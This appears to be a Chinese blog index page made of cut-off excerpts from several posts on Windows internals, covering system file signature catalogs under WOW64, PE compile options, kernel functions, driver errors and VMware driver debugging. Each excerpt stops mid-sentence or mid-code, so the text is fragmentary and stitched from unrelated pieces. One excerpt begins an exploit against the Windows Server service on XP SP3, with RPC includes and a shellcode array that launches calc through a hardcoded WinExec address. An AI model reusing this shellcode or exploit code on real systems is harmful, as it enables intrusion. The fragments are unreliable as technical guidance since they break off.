该笔记记录了WIN32程序在WIN64下无法校验system32目录下文件的MS签名问题的解决方法。

MS的文件签名不是打在PE文件里面，而是存放(HASH)在某个文件里面，例如“C:\WINDOWS\system32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\KB938464.cat”，从名字上我们就可以看出，该签名是随补丁包更新而更新的，注意，每个签名文件只含有几个文件的HASH而已，因此，你可以在该目录下看到很多个这种签名文件。

我们知道，WIN64为了对WIN32程序的支持，实现了WOW64模拟器，用来实现对WIN32程序的文件重定向和

从二进制PE文件中如何检查它的编译选项？我用各个搜索引擎都没搜任何相关信息，于是只得自己去探索其中的检测方法。我们知道，编译选项的效果最终都是作用在二进制文件本身，从文件里面肯定可以找出相关的信息。于是重新翻了一下MS的

《Microsoft Portable Executable and Common Object File Format Spec

之前写好就打包存放起来了，想想反正也没什么用，就贴出来吧。目的是学习交流，代码可能具有攻击性，使用者后果自负。

测试平台：Winxp SP3

#include <WinSock2.h>
#include <windows.h>
#include <Winnetwk.h>
#include "srvsvc_c.c"
#include <stdio.h>

#pragma comment(lib, "Mpr.lib")

UCHAR ucSC_SP3[] =
"\x33\xDB\x53\x68\x63\x61\x6C\x63\x8B\xF4\x53\x56\xBF"
"\xAD\x23\x86\x7C"//winexec地址

原来早有老外把该函数写成C了：

（上接：http://hi.baidu.com/1ian9yu/blog/item/2d9e402aef73ce9d023bf666.html）

BOOL __stdcall

打补丁后，知道更新的是netapi32.dll，祭出IDA对新老netapi32.dll进行BINDIFF，看看更改的地方。

mbstowcs无法把ANSI字符串转化成UNICODE字符串，它只会在高字节添加0x00而已。看来VC运行时库的函数不行啊，还是老老实实用windows API MultiByteToWideChar吧。

ObQueryNameString这个函数在DDK没有文档说明。我之前编写了下面一个函数，使用到了它：

// ***************************************************************
// function : GetFullPath
// purpose   : 得到注册表的完整路径
//     
// parameter : [IN]
//      [OUT]
//     
//
// author   : liangyu
// created   : 2008-7

当你使用CreateFile、ReadFile等函数进行操作驱动的时候，如果返回错误号1：

//
// MessageId: ERROR_INVALID_FUNCTION
//
// MessageText:
//
// Incorrect function.
//
#define ERROR_INVALID_FUNCTION           1L    // dderror

含义是函数不正确，千万别奇怪，这是一个典型的设备驱动返回的错误号，检查你的驱动吧。
其中很大的一个可能就是你的驱动没有实

环境的搭建参考：http://hi.baidu.com/1ian9yu/blog/item/bbaf1301240d7ad3267fb524.html，这里只说调试。

还是先统一一下名称，真实的操作系统叫HostOS，在VMware里虚拟的操作系统叫GuestOS。

我们编写完驱动后，当然要进行调试，这不可能在HostOS（本机）里调试，否则BOSD就麻烦了，而且支持本机调试的调试器比较流行的只有softice，这个东西早就停止更新了，而且对目前的操作系统的支持更是